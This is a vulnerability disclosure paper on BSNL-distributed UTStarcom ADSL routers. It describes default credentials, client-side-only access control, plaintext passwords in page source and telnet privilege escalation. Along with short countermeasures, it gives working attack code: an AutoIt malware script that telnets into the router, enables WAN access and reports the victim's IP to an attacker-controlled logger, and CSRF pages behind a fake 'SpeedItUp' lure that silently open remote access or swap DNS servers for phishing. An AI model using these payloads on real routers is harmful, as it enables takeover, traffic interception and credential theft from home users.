
Pwning the BSNL Users

SathyaPrakash K. aka Boris (Sathyaprakash222@gmail.com) and Varun V. (varun89.malar@gmail.com)
www.boris-info.co.cc
Panimalar Engineering College, Chennai, India

Abstract:
   The most common home ADSL modem-cum-router distributed by BSNL, India's No. 1 ISP, is the UTStarcom UT300R2U. The router's embedded web server has several flaws which make it vulnerable; exploiting them gives admin access to the router over the WAN. Wireless router products of the same company are also affected. Possible attacks on a compromised router are denial of service, remote sniffing, phishing etc. Affected firmware: UT300R2U series, software versions 3.08.BSNL_02.01.02_tr64, 3.12L.BSNL_01.A2pB023K.d20K_rc2 and more. We propose some countermeasure techniques to defeat these kinds of attacks.

1. UTStarcom:
   The US-based company whose modem-cum-router is distributed by BSNL [1] runs a server on its hardware which is prone to several exploits. The main failure of the server lies in its access control mechanism, which is improperly enforced. When logged in as ADMIN the user has full access to the router, whereas when logged in as a limited USER the user cannot modify any settings on the router. This is the protection mechanism implemented by the manufacturer.

2. Protection mechanisms:
   The standard so-called protection mechanisms built into the router are as follows:
   1. Remote HTTP access is blocked by default, which was once a famous vulnerability [2].
   2. Access control determines which privilege is given to which user group, thereby preventing USER from accessing ADMIN functions.

3. Vulnerability Description:

3.1 Poor user validation:
   The modem has 3 built-in users:
   1. admin
   2. user
   3. support (non-existent)
   These accounts have their respective usernames as default password. Usually most home users don't change the default ADMIN password. Some smarter users do, but they are not aware of which user accounts are present in their ADSL modem+router, so the USER account keeps its default password.

3.1.1 User privileges:
   The privilege of access is not controlled at all; simple JavaScript (menuBCM.js) handles the privilege-of-access mechanism. menuBCM.js does nothing but hide specific menus from USER and show everything to ADMIN. This is insecure: once the path of a menu page is known, anyone (USER) can request that page from the server, and the server replies with the result regardless of privilege.

3.1.2 Passwords:
   The poor implementation of the server is shown by the password.html page. This page is called by the ADMIN user while changing the passwords of users. It contains the passwords of all users in clear text, for the JavaScript to validate the password change.

3.2 Telnet service:
   As mentioned earlier, the privilege of access is not controlled at all; JavaScript does it by hiding menus. A JavaScript obviously plays no part in a telnet session, hence when a user logs in to the modem as USER in a telnet session, ADMIN access is given.

4. Proof of Concept:
   Let's have a look at the source code of the JavaScript which handles the privilege-of-access mechanism.

menuBCM.js:

    function menuAdmin(options) {   // all the options are displayed for ADMIN
       var std = options[MENU_OPTION_STANDARD];
       var proto = options[MENU_OPTION_PROTOCOL];
       var firewall = options[MENU_OPTION_FIREWALL];
       var nat = options[MENU_OPTION_NAT];
       var ipExt = options[MENU_OPTION_IP_EXTENSION];
       var wireless = options[MENU_OPTION_WIRELESS];
       var voice = options[MENU_OPTION_VOICE];
       var snmp = options[MENU_OPTION_SNMP];
       var ddnsd = options[MENU_OPTION_DDNSD];
       var sntp = options[MENU_OPTION_SNTP];
       .
       .
       if ( user == 'admin' )        // this piece of code calls the respective menu to be displayed
          menuAdmin(options);
       else if ( user == 'support' )
          menuSupport(options);
       else if ( user == 'user' )
          menuUser();
    }
    -------------code truncated

   Each menu is assigned to a variable, and the respective set of menus is called depending on the user logged in. Nothing in this decision happens on the server: the same pages are served to every logged-in account, and only the menu differs.

Accessing the router as ADMIN: (figure)

Accessing the password page in USER mode of privilege, by navigating to /password.html: (figure)



Accessing the router as USER: (figure)

Source code of password.html:

    <script language="javascript">
    <!-- hide
    pwdAdmin = 'lame';        // passwords for all users are passed in plaintext for comparing
    pwdSupport = 'support';
    pwdUser = 'user';
    function btnApply() {
       var loc = 'password.cgi?';
       with ( document.forms[0] ) {
          var idx = userName.selectedIndex;
          switch ( idx ) {
             case 0:
                alert("No username is selected.");
                return;
             case 1:
                if ( pwdOld.value == pwdAdmin )
                   break;
                else {
                   alert("Old admin password is wrong.");
                   return;
                }
             case 2:
                if ( pwdOld.value == pwdSupport )
                   break;
                else {
                   alert("Old support password is wrong.");
    -------------------------- truncated

   Passwords in plain text are used to compare against the ones the user enters while changing old passwords. Since the page is served to the USER account as well (3.1.1), a USER can read the ADMIN password straight out of the page source.

Telnet access:
   While connecting through telnet, USER is given ADMIN access.

5. Compromising the Router:
   From the above analysis we have determined that the entry point into the router is the default passwords, and that no one is concerned about the USER account.

5.1. Malware:
   The default IP address of the UTStarcom ADSL router is 192.168.1.1; if the default address has been changed, it could be enumerated with a few extra lines of code in the malware. The task of the malware is to telnet into the victim's router using the user:user combination, enable WAN HTTP access on the router, and log the victim's external IP address to the attacker. The attacker then navigates to the IP address from his logs and is greeted by the victim's router (provided port 80 on the WAN is not forwarded elsewhere). Using the user:user combination the attacker logs in to the victim's router and obtains the admin password by navigating to the /password.html page.

   Here is my custom script in AutoIt [3] doing the job:

Bjacker V 1.0:

    #include <IE.au3>
    ; open the attacker's IP logger in IE so the victim's external address is recorded
    $oIE = _IECreate("www.boris222.0fees.net/ip.php")
    _IENavigate($oIE, "www.boris222.0fees.net/ip.php")
    ; telnet to the router and log in with the default USER credentials,
    ; which get ADMIN access on the CLI (3.2)
    Run("telnet.exe 192.168.1.1")
    Sleep(1000)
    Send("user")
    Send("{ENTER}")
    Sleep(1000)
    Send("user")
    Send("{ENTER}")
    ; enable HTTP access from the WAN, then log out
    Send("remoteaccess enable --service http")
    Send("{ENTER}")
    Sleep(3000)
    Send("logout")
    Send("{ENTER}")
    ProcessClose("telnet.exe")

   http://attacker.net/ip.php has a script which logs the victim's IP address in the MySQL database server of the attacker. By specifying the necessary parameters while compiling this script into an exe, the executable can be run in hidden mode.

   remoteaccess enable --service http

   This command enables HTTP access to the device through the WAN.

5.2. Web way (CSRF):
   This method uses cross-site request forgery [4] to log in to the victim's router and uses iframes to make the necessary configuration changes on the router in a hidden manner. With the latest browsers having BEAP protection enabled, some strong social engineering skills are needed to carry out this attack successfully.

Bjacking V 1.1:
   This is the more advanced and most dangerous method of attack: when a BSNL user with a UTStarcom router/modem visits a web page, he gets his router compromised. It combines CSRF to log in to the router and change the remote access configuration, and it calls the IP logger to log the victim's IP. The entire process happens inside a hidden IFRAME; however, modern browsers with BEAP would ask the user for confirmation before logging in to 192.168.1.1, which could be bypassed by social engineering. A practical caveat: the hidden login also depends on the browser passing the user:user credentials embedded in the iframe URL. Internet Explorer has refused such URLs by default since 2004, and current browsers either prompt or drop the credentials for framed content, so the victim's browser decides whether this form of the attack works at all.

index.html:

    <html>
    <head>
    <title>SpeedItUp</title>
    </head>
    <body>
    <br><h1>This page configures your system to use high speed internet, please wait for few seconds for the script to configure</h1></br>
    Please click the button to continue.
    <iframe src="config.html" width=70 marginwidth="25%" height=20 scrolling="no" frameborder="0" class="iframe"></iframe>
    </body>
    </html>
config.html:

    <html>
    <body onload="window.scrollTo(1440, 980);">
    <iframe src="http://user:user@192.168.1.1/scsrvcntr.cmd?action=save&http=1&http=3&icmp=1&snmp=1&snmp=3&telnet=1&telnet=3&tftp=2&tftp=0" width=3000 height=1000 frameborder=0></iframe>
    <iframe src="http://www.boris222.0fees.net/ip.php" width=3000 height=1000 frameborder=0></iframe>
    </body>
    </html>

   The first iframe requests http://user:user@192.168.1.1/scsrvcntr.cmd?action=save&http=1&http=3&icmp=1&snmp=1&snmp=3&telnet=1&telnet=3&tftp=2&tftp=0, which logs in with the default USER credentials and enables HTTP access on the WAN; a plain GET is enough, because the router saves the configuration on a GET with no anti-CSRF token and no check of where the request came from. The second iframe, http://www.boris222.0fees.net/ip.php, logs the victim's IP address. The oversized iframes and the onload scroll keep the framed pages out of the victim's view.

Exploit in action: (figure)

6. Possible Attacks:

6.1. Denial of Service:
   1. The attacker might implement MAC filtering or other IP restrictions on the victim's router.
   2. Specifying an unreachable static route.
   3. Killing the router's httpd server process repeatedly by telneting into the victim's router.

6.2. Sniffing:
   1. The attacker could specify a static route passing through his network for the victim's router and sniff the victim's traffic.

6.3. Phishing:
   This is the attack of our special interest, as it is one of the stealthiest attacks when combined with routing attacks. The attacker could specify a fake DNS server for the victim's router and carry out phishing attacks.

   http://192.168.1.1/dnscfg.cgi?dnsPrimary=4.1.1.1&dnsSecondary=2.1.2.3&dnsDynamic=0&dnsRefresh=1

   This changes the primary and secondary DNS servers of the victim's router.

PoC:

Normal operation:
   The router has a default DNS server assigned by the ISP; sometimes it may be provided by a DHCP server.

Victim's network layout: (figure)
   This is a normal (usual) network setup of a home user.

   index.html is the same SpeedItUp wrapper page as in 5.2; config.html becomes:

config.html:

    <html>
    <body onload="window.scrollTo(1440, 980);">
    <iframe src="http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary=113.21.12.31&dnsSecondary=113.21.12.31&dnsDynamic=0&dnsRefresh=1" width=3000 height=1000 frameborder=0></iframe>
    </body>
    </html>

   The above page changes the primary and secondary DNS servers to the ones specified by the attacker.

Attack scenario: (figure)
   The DNS server specified by the attacker phishes all the famous sites (e-mail, net banking, social networking etc.). Some advanced users might wonder about SSL (https); for them there comes the routing attack: by specifying a static route through the attacker's network, MITM attacks can be carried out, and SSL Strip [5] does the job for advanced users.

Statistics [6]: (figure: number of BSNL users)
   Most of the North Indian BSNL clients are provided with Huawei modem-cum-routers, which are not affected by this vulnerability (I haven't reviewed it); the remaining are given this UTStarcom product, so by our estimate nearly 20% of Indian Internet users are vulnerable to this exploit.
Solution:

   Temporary: change the default password for the ADMIN and USER groups of users, as the default user:user combination is what lets the attacker intrude into the router.

   Permanent: get rid of those nasty JavaScripts and implement the access control server-side, with session cookies. Access control using client-side scripting is completely ridiculous, as the client can do anything.

   Last but not least: "Don't give dumb instructions [7] to home users on configuring the device."
References:
[1] http://investorrelations.utstar.com/releasedetail.cfm?ReleaseID=282468
[2] http://www.thinkdigit.com/forum/archive/index.php/t-57773.html
[3] http://www.autoitscript.com/autoit3
[4] http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
[5] http://www.thoughtcrime.org/software/sslstrip/
[6] http://pcworld.in/india/features/5931689/PDAs__Cell_Phones/Broadbcnd_Awards_2009
[7] http://www.chennai.bsnl.co.in/BBS/Wireless/WirelessSecurity.htm

Special thanks to:
http://www.hak5.org/
http://www.underground-systems.org/
http://haktstudios.com/
http://www.garage4hackers.com/

								